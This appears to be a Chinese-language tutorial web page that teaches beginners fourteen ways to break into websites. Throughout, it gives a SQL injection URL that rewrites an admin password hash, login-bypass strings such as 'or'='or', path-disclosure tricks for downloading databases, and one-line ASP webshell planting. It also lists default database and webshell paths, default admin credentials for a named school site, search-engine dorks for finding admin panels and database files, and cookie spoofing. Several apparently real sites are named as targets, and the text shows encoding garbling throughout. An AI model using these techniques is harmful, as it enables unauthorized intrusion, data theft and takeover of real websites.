基礎(chǔ):菜鳥學(xué)習(xí)入侵的14種可利用方法

字號:


    1.上傳漏洞[不多講]
    pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現(xiàn)“請登陸后使用”,80%就有漏洞了!
    有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.
    2.注入漏洞[不多講]
    pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數(shù)據(jù)庫].那么我們可以用以下命令:
    http://注入網(wǎng)址;update admin set password=’新MD5密碼’ where password=’舊MD5密碼’-- [admin為表名.]
    3.旁注,也就是跨站.
    我們?nèi)肭帜痴緯r可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務(wù)器的站點,然后在利用這個站點用提權(quán),嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務(wù)器的絕對路徑經(jīng)過加密,這就看我們的本事了
    4.暴庫:把二級目錄中間的/換成%5c
    EY:http://www.scbzlx.com/test/test/test.asp?test=test&test=1
    如果你能看到:’E:\test\test\database\test.asa’不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務(wù)器。
    這樣的就是數(shù)據(jù)庫了。下載時用FLASHGET換成.MDB格式的就行.
    5.’or’=’or’這是一個可以連接SQL的語名句.可以直接進(jìn)入后臺。我收集了一下。類似的還有:
    ’or’’=’ " or "a"="a ’) or (’a’=’a ") or ("a"="a or 1=1-- ’ or ’a’=’a
    6.社會工程學(xué)。這個我們都知道吧。就是猜解。
    7.寫入ASP格式數(shù)據(jù)庫。就是一句話木馬[ ],常用在留言本.
    EY:http://www.scbzlx.com/book/book.asp[這個就是ASP格式的數(shù)據(jù)庫],再寫入一句話木馬
    8.源碼利用:一些網(wǎng)站用的都是網(wǎng)上下載的源碼.有的站長很菜.什么也不改.
    EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp
    這個站用的是:杰出校友錄,源碼我下過了,
    默認(rèn)數(shù)據(jù)庫/webshell路徑:\database\liangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin
    9.默認(rèn)數(shù)據(jù)庫/webshell路徑利用:這樣的網(wǎng)站很多/利人別人的WEBSHELL.
    /Databackup/dvbbs7.MDB
    /bbs/Databackup/dvbbs7.MDB
    /bbs/Data/dvbbs7.MDB
    /data/dvbbs7.mdb
    /bbs/diy.asp
    /diy.asp
    /bbs/cmd.asp
    /bbs/cmd.exe
    /bbs/s-u.exe
    /bbs/servu.exe
    工具:網(wǎng)站獵手 挖掘雞
    EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB
    10.查看目錄法:人一些網(wǎng)站可以斷開目錄,可以方問目錄。
    EY:http://www.ujs168.com/shop/admin/
    http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/
    這樣我們可以找到數(shù)據(jù)庫,下載不用我教吧
    11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL]
    12.搜索引擎利用:
    (1).inurl:flasher_list.asp 默認(rèn)數(shù)據(jù)庫:database/flash.mdb 后臺/manager/
    (2).找網(wǎng)站的管理后臺地址:
    site:xxxx.comintext:管理
    site:xxxx.comintitle:管理 <關(guān)鍵字很多,自已找>
    site:xxxx.cominurl:login
    (3).查找access的數(shù)據(jù)庫,mssql、mysql的連接文件
    allinurl:bbsdata
    filetype:mdbinurl:database
    filetype:incconn
    inurl:datafiletype:mdb
    我主不做了。。自已做做吧。。
    13.COOKIE詐騙:
    把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。這個我就不多講了
    14.利用常見的漏洞:如動網(wǎng)BBS
    可以先用:dvbbs權(quán)限提升工具,使自已成為前臺管理員。
    THEN,運用:動網(wǎng)固頂貼工具,找個固頂貼,再取得COOKIES,這個要你自已做。我們可以用WSockExpert取得Cookies/NC包
    這個我就不做了,網(wǎng)上教程多的是,自已下個看看。
    工具:dvbbs權(quán)限提升工具 動網(wǎng)固頂貼工具
    15.還有一些老漏洞。如IIS3,4的查看源碼,5的DELETE
    CGI,PHP的一些老洞,我就不說了啊。。太老了。沒有什么大用途。